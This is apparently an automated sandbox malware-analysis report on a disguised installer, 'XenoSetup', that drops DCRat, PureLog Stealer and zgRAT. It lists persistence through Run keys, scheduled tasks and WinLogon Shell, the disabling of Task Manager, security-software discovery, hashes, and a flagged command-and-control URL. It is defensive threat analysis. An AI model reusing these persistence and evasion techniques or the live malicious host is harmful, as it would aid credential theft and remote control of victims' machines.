Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Queries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Queries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Queries volume information: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe VolumeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Queries volume information: C:\portBrokerDll\DriverbrokerCrtDhcp.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FFDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

6_2_00FFDF1E

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FEB146 GetVersionExW,

6_2_00FEB146

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.3090884255.000000001B5A0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.13beaed8.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NZdXlPbVdUubKXQ.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 5692, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.13beaed8.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NZdXlPbVdUubKXQ.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DriverbrokerCrtDhcp.exe PID: 5692, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	13 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	57 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	41 Registry Run Keys / Startup Folder	41 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	261 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
XenoSetup(2).exe.bin.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Cassiopeia
XenoSetup(2).exe.bin.exe	100%	Avira	TR/Dropper.Gen
XenoSetup(2).exe.bin.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\GyShWgyC.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\Desktop\IlCyhHua.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BFVQSOun.log	100%	Avira	TR/Agent.jbwuj
C:\Users\user\Desktop\ESyrPCdJ.log	100%	Avira	TR/Agent.jbwuj
C:\Users\user\Desktop\ItmQLqVf.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\Aqnqislq.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\ARRIhAyp.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\GyShWgyC.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GGCzAPYH.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\IlCyhHua.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\Aqnqislq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\ARRIhAyp.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\FSpHSmDL.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ARRIhAyp.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\Aqnqislq.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BFVQSOun.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\BOtQCANk.log	29%	ReversingLabs
C:\Users\user\Desktop\BcHAIFcQ.log	8%	ReversingLabs
C:\Users\user\Desktop\ESyrPCdJ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\FSpHSmDL.log	8%	ReversingLabs
C:\Users\user\Desktop\GGCzAPYH.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GpvhmufF.log	9%	ReversingLabs
C:\Users\user\Desktop\GyShWgyC.log	17%	ReversingLabs
C:\Users\user\Desktop\IlCyhHua.log	17%	ReversingLabs
C:\Users\user\Desktop\ItmQLqVf.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KZGGSUqY.log	25%	ReversingLabs
C:\Users\user\Desktop\LuUydMov.log	5%	ReversingLabs
C:\Users\user\Desktop\LxMgmcSS.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\MPdHuBxA.log	25%	ReversingLabs
C:\Users\user\Desktop\NZUxJEKO.log	5%	ReversingLabs
C:\Users\user\Desktop\NoWOUMSl.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NpzpwslB.log	25%	ReversingLabs
C:\Users\user\Desktop\PIQPERQj.log	8%	ReversingLabs
C:\Users\user\Desktop\RPLnQAKH.log	4%	ReversingLabs
C:\Users\user\Desktop\TZhoQTpI.log	3%	ReversingLabs
C:\Users\user\Desktop\UWIwmTED.log	8%	ReversingLabs
C:\Users\user\Desktop\UfDWuYEk.log	12%	ReversingLabs
C:\Users\user\Desktop\WKMEYgAB.log	25%	ReversingLabs
C:\Users\user\Desktop\XOSeUCEW.log	17%	ReversingLabs
C:\Users\user\Desktop\ZSKNtyuw.log	25%	ReversingLabs
C:\Users\user\Desktop\ZTxvzCno.log	11%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\bGOWfMqu.log	12%	ReversingLabs
C:\Users\user\Desktop\dQveIBvX.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eDXMSiYF.log	8%	ReversingLabs
C:\Users\user\Desktop\eLGexRyL.log	25%	ReversingLabs
C:\Users\user\Desktop\frbUEvTD.log	4%	ReversingLabs
C:\Users\user\Desktop\gQJUAkON.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\jCRLjesV.log	8%	ReversingLabs
C:\Users\user\Desktop\kEjDZxDz.log	21%	ReversingLabs
C:\Users\user\Desktop\ldZbGFkR.log	17%	ReversingLabs
C:\Users\user\Desktop\lmJukoKX.log	9%	ReversingLabs
C:\Users\user\Desktop\ogLKbooN.log	8%	ReversingLabs
C:\Users\user\Desktop\paukoYZl.log	3%	ReversingLabs
C:\Users\user\Desktop\pczkrlLQ.log	8%	ReversingLabs
C:\Users\user\Desktop\qodKYthi.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\remTNUPL.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\tBjJkMRH.log	21%	ReversingLabs
C:\Users\user\Desktop\uOpJsBHp.log	21%	ReversingLabs
C:\Users\user\Desktop\vMsrqipz.log	21%	ReversingLabs
C:\Users\user\Desktop\vcvJAqxW.log	29%	ReversingLabs
C:\Users\user\Desktop\xvoKkvvU.log	11%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate

Source	Detection	Scanner	Label
http://804052cm.nyashkoon.ru/imagelineGeoTest.php	100%	Avira URL Cloud	malware
http://804052cm.nyashkoon.ru	100%	Avira URL Cloud	malware
http://804052cm.nyashkoon.ru/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
804052cm.nyashkoon.ru	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://804052cm.nyashkoon.ru/imagelineGeoTest.php	NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.m	powershell.exe, 00000002.00000002.2325222503.000001A1F8E66000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/dotnet/app-launch-failedWould	Xeno.exe	false		high
https://github.com/Riz-ve/Xeno.	Xeno.exe, 00000007.00000000.2346254020.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/dotnet-core-applaunch?Architecture:	XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Riz-ve/Xeno	Xeno.exe	false		high
http://804052cm.nyashkoon.ru/	NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/dotnet/app-launch-failed	Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://804052cm.nyashkoon.ru	NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp, DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp, NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/dotnet-core-applaunch?	XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	false		high
https://aka.ms/dotnet/app-launch-failedDownload	Xeno.exe	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590013
Start date and time:	2025-01-13 13:31:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	XenoSetup(2).exe.bin.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@75/85@5/0
EGA Information:	Successful, ratio: 15.4%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 1864 because it is empty
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 2528 because it is empty
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 4372 because it is empty
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 5376 because it is empty
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 5692 because it is empty
Execution Graph export aborted for target DriverbrokerCrtDhcp.exe, PID 6952 because it is empty
Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 1476 because it is empty
Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 1912 because it is empty
Execution Graph export aborted for target NZdXlPbVdUubKXQ.exe, PID 3184 because it is empty
Execution Graph export aborted for target XenoSetup(2).exe.bin.exe, PID 876 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6400 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:32:18	API Interceptor	18x Sleep call for process: powershell.exe modified
07:33:04	API Interceptor	1x Sleep call for process: NZdXlPbVdUubKXQ.exe modified
13:32:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XenoSetup(1) C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
13:32:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XenoSetup(1) C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
13:32:51	Task Scheduler	Run new task: NZdXlPbVdUubKXQ path: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:32:51	Task Scheduler	Run new task: NZdXlPbVdUubKXQN path: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:32:54	Task Scheduler	Run new task: DriverbrokerCrtDhcp path: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
13:32:54	Task Scheduler	Run new task: DriverbrokerCrtDhcpD path: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
13:32:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:33:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
13:33:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:33:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
13:33:30	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:33:38	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
13:33:54	Autostart	Run: WinLogon Shell "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
13:34:02	Autostart	Run: WinLogon Shell "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\ARRIhAyp.log	DCobxod.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SearchIndexer.exe	Get hash	malicious	DCRat, Neshta, PureLog Stealer, zgRAT	Browse
	85D5ktqjpd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3XtEci4Mmo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	aW6kSsgdvv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kJrNOFEGbQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	lEwK4xROgV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse
	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
